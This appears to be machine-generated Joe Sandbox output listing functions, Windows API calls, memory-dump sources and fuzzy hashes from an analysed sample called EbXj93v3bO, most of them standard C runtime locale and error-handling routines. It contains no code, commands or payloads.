Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84
C, xrefs: 0042EF48, 0042ED32, 0042EBC1

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0254B271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02540A23,?,?,?,?,0254047A,?,00000004), ref: 0254B353
_wcschr.LIBVCRUNTIME ref: 0254B3E3
_wcschr.LIBVCRUNTIME ref: 0254B3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02540A23,00000000,02540B43), ref: 0254B494

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: cefafb32415fe954ffa56ee0dad81635ec8d32e8d63a86161cd26d37f0fabbc7
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: 3F61E671A00207AADB28AB35CC41BBAF7ADFF4471CF54442AED05D7180EF74D5418BA8

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0253A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0251DAD7), ref: 0253A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0251DAD7), ref: 0253A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0251DAD7), ref: 0253A749

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: c316ffecb0a1dc21d47ebe257fcf5980fedd13861f4330fd91435b4fb52f764b
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: CB31C77490132DABCB21DF64DD8879CBBB8BF58711F5051EAE40CA72A0E7349B858F48

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 025400C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0254009C,00000000,00457970,0000000C,025401F3,00000000,00000002,00000000), ref: 025400E7
TerminateProcess.KERNEL32(00000000,?,0254009C,00000000,00457970,0000000C,025401F3,00000000,00000002,00000000), ref: 025400EE
ExitProcess.KERNEL32 ref: 02540100

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: d96b975a02ae7a081572c57f981a2cde0a9cd567f1ec41ebc420a8dc7dc79813
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 57E0B635000149ABCF15AF54DD08A59BF6AFB46B8AB604024FA098B175CF76EA42DB48

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 0251092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 025109DC, 025109DF, 025109E4
., xrefs: 0251095F
l, xrefs: 02510966

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 0b4a032516c24b53235a17f209918e8fc1065c72a763e09bf55fcd27b84de7f6
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: D9314DB6900609DFEB10CF99C880AAEBBF5FF48324F15404AD841A7354D771EA85CFA4

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0253ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: d4f1374a31b78bc5e8a29a275f1ef02b1f60fcfd72fc74c6116a0b3a19bc60d0
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: 47023C71E002199FDF15CFA9D8806AEBBF1FF88314F25926AD819E7380D731A941CB94

Function 02512605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0251262C
PostQuitMessage.USER32(00000000), ref: 025127CA

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 70ec1339406d3f3044bd6af72953e0d6c53e9cbea26319f230784cf799c6497d
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 95413D25A64384A5E731EFA4FC45B2637B0FF64762F10252AD528CB2B2E3B28540C75E

Function 02546F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02546F21,?,?,00000008,?,?,0254F3E2,00000000), ref: 02547153

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 84086185c62810a24fba839658968c7618f254904067f8ffac1ddd54a364841c
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 06B14B312106089FD715CF28C48AB65FFE0FF49368F258658E89ACF2A5C736E991CB44

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 0254B8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

Part of subcall function 02542141: _free.LIBCMT ref: 025421A0
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0254B900

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: c16f90854f35b7d19a352f468f51a59d5cbfcea53b54540bd86e590bc55a7d38
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: 6C216A7295021AABEB28AE24DC41BBAB7A9FB4431CF10017AED01D7150EF39D944DA58

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 0254B534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02540A1C,?,0254BC89,00000000,?,?,?), ref: 0254B5A6

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: b7cc2aac14fb95952867d7068d8469bdd9f54456bead285a2872896d6d8aeafe
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 8811293A6007015FDB189F39C8917BAFBA2FF8431CB14482CD94687640E771B902CB44

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 0254BADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0254B87A,00000000,00000000,?), ref: 0254BB08

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 25473b164ec1c9d157c7600195423e1aad5c89c33108a3ddbc586e4bd9559b19
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: 2DF0F932E001166BDB285A24CC45BBAFB58FB4075CF040469EC05A3144EF70FE01C6D8

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 0254B5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,02540A1C,?,0254BC4D,02540A1C,?,?,?,?,?,02540A1C,?,?), ref: 0254B61B

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: d47aceb29e19eaee5e92a3faff84a42d1cccc77d3e6aab764a535f116c580211
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: 2CF0C2367007055FDB286F39DC81B7ABB95FF8076CF15442DFA058B650EB71D8028A48

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 02545427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0254047A,?,00000004), ref: 0254547A

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: ae5f9e4950d1b1706ccac02e2c31ee76df0892482dd8327a377f1e3cb4d83223
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: A4F02B31680318BFDB015F50CC01F6EBB26FF54B02F904115FC0567190EE719E20AA9D

Function 02545034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0253E654: RtlEnterCriticalSection.NTDLL(020C0DAF), ref: 0253E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0254506C

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: dcb000c6094ba5d2d1fd3c9742873bcdb433ed4f505edffc495fe9a85ee946b1
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: 06F08732A21301DBEB00EF68D801B9C77E1BF95721F10426AF900EB2E1CB7999448F4A

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
